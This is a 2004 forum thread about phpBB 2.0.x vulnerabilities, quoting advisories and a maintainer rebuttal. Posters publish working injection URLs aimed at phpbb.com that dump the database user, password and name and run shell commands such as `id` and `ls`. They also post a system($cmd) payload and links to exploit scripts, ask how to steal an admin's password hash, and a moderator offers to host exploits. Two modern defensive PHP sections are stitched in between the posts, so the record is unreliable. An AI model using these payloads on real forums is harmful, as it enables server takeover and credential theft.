Waraxe IT Security Portal
vulns in phpbb 2.0.10
Posted: Mon Nov 15, 2004 5:56 pm
hebe (Advanced user, joined Sep 04, 2004, 59 posts)
Quote:
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 14, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to manipulate the query into pulling data
they should not previously be able to obtain. (Such as passwords)

Description: Requiring the account be a moderator, or having a moderation session
with the correct cookie to actually execute this attack, it is not that big
of an issue, but it still is there.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Including an F (forum) with a MODE, but without a T (topic), leads to an SQL error.
But because of topic turning all user input values into numbers, the injection is
useless, unless a way around this was found.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session]

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Line: 801
----------------------------------------------------------------------------------------------------------------------------------

$sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username
FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt
WHERE p.topic_id = $topic_id
AND p.poster_id = u.user_id
AND p.post_id = pt.post_id
ORDER BY p.post_time ASC";

----------------------------------------------------------------------------------------------------------------------------------
// Line: 806
----------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

Could not get topic/post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id

SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC

Line : 809
File : modcp.php



2nd
Quote:
_ _ ______ _
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 1, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to manipulate the query into pulling data
they should not previously be able to obtain. (Such as passwords)
Arbitrary EXEC allows you, if you can get on to a new line, to execute
your own PHP, which can be fatal.

Description: Because of the way urldecode and magic quotes work,
it turns %2527 into %27, which is a single quote, and it
leaves it unslashed. This gives you an SQL Injection, leading
to an arbitrary PHP exec hole. But because you can't get outside
preg_replace because of magic quotes, this is very very useless.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Highlighting %2527 on any topic.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

viewtopic.php?t=1&highlight=%2527

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Error
----------------------------------------------------------------------------------------------------------------------------------

Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109

---------------------------------------------------------------------------------------------------------


psoftx wrote that in the phpBB community:
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
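To make the mechanism in the second advisory concrete, here is a small added PHP example; it is not phpBB's code and not part of howdark's advisory. The first half simulates the three layers the advisory names (the web server's single URL decode, magic_quotes_gpc, simulated here with addslashes(), and the second urldecode() in viewtopic.php) and shows how %2527 arrives as a bare quote that no escaping layer ever saw. The parse error quoted above shows why that quote matters: the highlight terms were interpolated into the replacement string of a preg_replace() call using the /e modifier, so the string was evaluated as PHP, and preg_quote() does not escape a single quote. The second half is a highlighter written the way a maintainer would write it today: the term list is decoded only once, checked against a whitelist, passed through preg_quote(), and applied with preg_replace_callback(), so no user-controlled text is ever evaluated as code. The function names and the whitelist are this example's own choices.

```php
<?php
// Added example, not phpBB's code: how a double-encoded parameter slips past
// request-time escaping, and how to build a highlight pattern without /e.

// Constructed input: the web server decodes "?highlight=%2527" once and hands
// PHP the literal three characters "%27".
$fromServer = '%27';

// magic_quotes_gpc (the PHP 4 option the advisory refers to) escaped quotes in
// request data; addslashes() simulates it here. There is no quote yet, so the
// value is unchanged.
$afterMagicQuotes = addslashes($fromServer);

// viewtopic.php decoded the value a second time, which yields a bare single
// quote that no escaping layer ever saw.
$afterSecondDecode = urldecode($afterMagicQuotes);

printf("server: %s | magic quotes: %s | second decode: %s\n",
    $fromServer, $afterMagicQuotes, $afterSecondDecode);

/**
 * Turn a raw highlight string into a regex, or null if nothing usable remains.
 * Nothing is decoded here: the web server already did that once. Each word
 * must match a whitelist (letters, digits, underscore, hyphen; an assumption
 * that fits word search) and is then passed through preg_quote() as well.
 */
function build_highlight_pattern(string $rawHighlight): ?string
{
    $words = [];
    foreach (explode(' ', $rawHighlight) as $word) {
        if ($word !== '' && preg_match('/^[\p{L}\p{N}_-]{1,64}$/u', $word)) {
            $words[] = preg_quote($word, '#');
        }
    }
    return $words ? '#\b(' . implode('|', $words) . ')\b#iu' : null;
}

/**
 * Wrap matched words in <b>. preg_replace_callback() takes a PHP closure, so
 * the replacement is never built from, or evaluated as, a string containing
 * user input; that is the property the /e modifier in the old code lacked.
 */
function highlight_message(string $message, string $rawHighlight): string
{
    $pattern = build_highlight_pattern($rawHighlight);
    if ($pattern === null) {
        return $message;
    }
    return preg_replace_callback($pattern, function (array $m): string {
        return '<b>' . $m[1] . '</b>';
    }, $message);
}

$post = 'the quick brown fox';
// Ordinary search terms are wrapped in <b>.
echo highlight_message($post, 'quick fox'), "\n";
// A term carrying quotes, dots or parentheses fails the whitelist and is
// dropped, so the post comes back untouched.
echo highlight_message($post, "'.bar().'"), "\n";
```

Run it with the php command-line binary. The first echo wraps quick and fox in <b> tags; the second prints the post unchanged, because the only "word" in the term fails the whitelist and the pattern is never built. The whitelist is the part that matters: preg_quote() protects the regex, not the code that surrounds it, which is why the original preg_quote() call in viewtopic.php did not help.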
Posted: Mon Nov 15, 2004 11:58 pm
jessica (Regular user, joined Sep 18, 2004, 5 posts)
Quote:
-----------------------------------------------------------------------------------------------------
// Updates
-----------------------------------------------------------------------------------------------------

Just a note on the phpBB finds, they are NOT SQL Injection issues,
they are just poorly coded errors, as I had stated.

This is just immature of the phpBB Group to say we were persistent
about these, considering they were not submitted to BugTRAQ because
we knew for a fact they were useless.

The highlight error, as I stated is not harmful under the circumstances
of the default code, but if presented with minor changes, which is known
to some widely known phpBB Boards, they could present problems.

The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry
for the misworded presentation. I found this awhile ago, and I asked
a friend, who is well knowledged about these subjects, what to label
this with the options I had for the phpBB Security Tracker, and this is
what he gave me.

I did not check over what I sent, stupidly, and that is how it was sent out.
Sorry for the inconvenience.

Keep note, that these would not even be on BugTRAQ if phpBB were
not immature about the bug reports I gave them, and they mildly ignored.
Posted: Wed Nov 17, 2004 2:30 pm
LINUX (Moderator, joined May 24, 2004, 404 posts, location: Caiman)
psoftx wrote that in the phpBB community:
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.

----------------------------------

PHPBB developers read read read ERROR ERROR

WTF xD

Good work Jessica
Posted: Thu Nov 18, 2004 1:47 am
jessica (Regular user, joined Sep 18, 2004, 5 posts)
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps
Posted: Thu Nov 18, 2004 7:17 am
hebe (Advanced user, joined Sep 04, 2004, 59 posts)
jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps

hahah they must patch now
and also these
1. "username" is $dbuser:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527

2. "username" is $dbpasswd:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527

3. "username" is $dbname:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527

4. "username" is result of passthru("id"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`id`.%2527
"username" is result of passthru("ls"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`ls`.%2527
Posted: Thu Nov 18, 2004 8:03 am
LINUX (Moderator, joined May 24, 2004, 404 posts, location: Caiman)
OMG very nice Laughing Laughing Laughing Laughing Laughing
Posted: Thu Nov 18, 2004 10:53 am
hebe (Advanced user, joined Sep 04, 2004, 59 posts)
jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps


This only works on Windows servers?
"/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
cmd?
Posted: Thu Nov 18, 2004 1:05 pm
jessica (Regular user, joined Sep 18, 2004, 5 posts)
No, it'll work on most OSes.

It'll just be limited by what OS it is, i.e. Unix is ls and Windows is dir.

It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read, like, config.php (cat config.php on Unix), and you have to view the page source, since config.php has <? ?> and the page parses it thinking it's HTML.

But other than that you are pretty much out of luck.

CMD Example Script is here:
http://www.howdark.com/exploit
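For anyone running a 2.0.x board at the time, the defensive question is how to spot these requests in the web server's access log. The following PHP script is an added example, not something from the thread or from howdark's exploit page; the log lines are constructed, and the function names are this example's own. It flags the two request shapes the thread discusses: a highlight value that still contains a percent-escape after the web server's single decode (the %2527 trick), and a modcp.php call that carries a mode but no purely numeric topic id (the shape the first advisory describes).

```php
<?php
// Added example, not from the thread: flag the two request shapes discussed
// above in Apache-style access-log lines. The log lines below are constructed.

/**
 * Return a reason string if the request line looks like one of the two
 * probes, or null if it looks benign.
 */
function is_suspicious_request(string $logLine): ?string
{
    // Pull the request target out of '"GET /path?query HTTP/1.x"'.
    if (!preg_match('#"(?:GET|POST) (\S+) HTTP/#', $logLine, $m)) {
        return null;
    }
    $target = $m[1];
    $query  = (string) (parse_url($target, PHP_URL_QUERY) ?? '');
    parse_str($query, $params);   // decodes percent-escapes exactly once, as the server did

    // 1. After one decode a legitimate highlight term has no %XX left in it.
    //    A leftover escape means the client sent it double-encoded (%2527 -> %27).
    if (isset($params['highlight']) && is_string($params['highlight'])
        && preg_match('/%[0-9A-Fa-f]{2}/', $params['highlight'])) {
        return 'double-encoded highlight parameter';
    }

    // 2. modcp.php with a mode but no purely numeric topic id: the first
    //    advisory says this combination already produces an SQL error.
    if (strpos($target, 'modcp.php') !== false && isset($params['mode'])
        && (!isset($params['t']) || !is_string($params['t']) || !ctype_digit($params['t']))) {
        return 'modcp.php called without a numeric topic id';
    }
    return null;
}

/** Scan a list of log lines and return [lineNumber, reason] pairs for the hits. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $index => $line) {
        $reason = is_suspicious_request($line);
        if ($reason !== null) {
            $hits[] = [$index + 1, $reason];
        }
    }
    return $hits;
}

// Constructed sample log (addresses from the documentation ranges, not real hosts).
$sampleLog = [
    '203.0.113.5 - - [18/Nov/2004:13:05:01 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=phpbb HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Nov/2004:13:05:09 +0000] "GET /phpBB2/viewtopic.php?t=1&highlight=%2527 HTTP/1.1" 200 1034',
    '198.51.100.7 - - [18/Nov/2004:13:06:44 +0000] "GET /phpBB2/modcp.php?mode=split&f=1&t=abc HTTP/1.1" 200 2048',
    '198.51.100.7 - - [18/Nov/2004:13:07:02 +0000] "GET /phpBB2/modcp.php?mode=split&f=1&t=42 HTTP/1.1" 200 2048',
];

foreach (scan_log($sampleLog) as [$lineNo, $reason]) {
    printf("line %d: %s\n", $lineNo, $reason);
}
```

Run with the php command-line binary: lines 2 and 3 of the sample are reported, the other two pass. The %XX test is a heuristic, since a search term that legitimately contains a percent sign followed by two hex digits would also trip it, so treat a hit as something to look at alongside the response size and the rest of that client's requests rather than as proof on its own.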
Posted: Thu Nov 18, 2004 1:11 pm
jessica (Regular user, joined Sep 18, 2004, 5 posts)
And just to think phpBB devs reported me to my ISP for trying to help them with this.

assholes.
Posted: Fri Nov 19, 2004 3:15 am
LINUX (Moderator, joined May 24, 2004, 404 posts, location: Caiman)
Jessica, if you need a host for exploits, send a PM. Surprised
Posted: Sun Nov 21, 2004 1:57 pm
sygma (Regular user, joined Nov 21, 2004, 7 posts)
Quote:
&highlight=%2527.$poster=$dbname.%2527


Is there a way I could make an SQL query and thus obtain the admin's hashed password?

_________________
[i]no word to save thee[/i]
Posted: Sun Nov 21, 2004 10:14 pm
kranium (Regular user, joined Jun 27, 2004, 7 posts)
sygma wrote:
Quote:
&highlight=%2527.$poster=$dbname.%2527


Is there a way I could make an SQL query and thus obtain the admin's hashed password?


Yes, I wish I could do that too. I used the exploit in http://www.howdark.com/exploit/ but every time I try some SQL query it shows me NOTHING Sad Any ideas?
Posted: Mon Nov 22, 2004 9:34 pm
SteX (Advanced user, joined May 18, 2004, 181 posts, location: Serbia)
Doesn't work for me...

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
Posted: Tue Nov 23, 2004 3:59 am
LINUX (Moderator, joined May 24, 2004, 404 posts, location: Caiman)
SteX wrote:
Doesn't work for me...



What doesn't work, SteX? I tested it and it works nicely Laughing

The exploit works on all phpBB forums 2.0.* - 2.0.10
Posted: Tue Nov 23, 2004 2:33 pm
SteX (Advanced user, joined May 18, 2004, 181 posts, location: Serbia)
What did you enter in the SQL tab..?

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------